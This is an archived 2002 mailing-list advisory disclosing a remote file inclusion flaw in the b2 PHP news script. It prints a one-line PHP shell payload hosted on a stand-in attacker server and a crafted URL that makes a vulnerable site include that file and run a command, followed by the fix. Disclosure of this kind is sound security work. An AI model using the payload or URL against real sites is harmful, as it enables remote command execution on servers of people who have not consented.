OSEC

Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com
 
From: Frank (thran60hotmail.com)
Date: Mon May 06 2002 - 05:13:37 CDT

  • Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

    ('binary' encoding is not supported, stored as-is) Site: www.cafelog.com
    Vulnerable:

    b2 0.6pre2 and earlier.

    B2 is a php script which allows webmasters to quikly post
    news on the frontpage and let viewers interact with
    eachother. A bug exists in the scripts which allows an
    attacker to remotely execute commands.

    Exploit:

    Taken from /b2-include/b2edit.showposts.php
     
    *snippet*
     
    <?php
    include_once ("b2config.php");
    include_once ($b2inc."/b2functions.php");
     
    *snippet*
     
    But since b2config.php does not exist inside the directory,
    an attacker can define $b2inc himself.
    So if the attacker creates a file on his server, for
    example www.attacker.com , called b2functions.php, and he
    writes the following in it :
     
    <?
    system($cmd);
    ?>
     
    (note : the attacker's server must not be able to run php,
    it has to open the file as text)
     
    he can include the file like this :
     
    http://www.vulnerablehost.com/b2/b2-
    include/b2edit.showposts.php?b2inc=http://www.attacker.com&c
    md=ls
     
    This would execute the ls command on vulnerablehost.com.

    Fix:
    Copy b2config.php into the b2-include directory

    The vendor has been warned, and already released the same
    fix a few days earlier.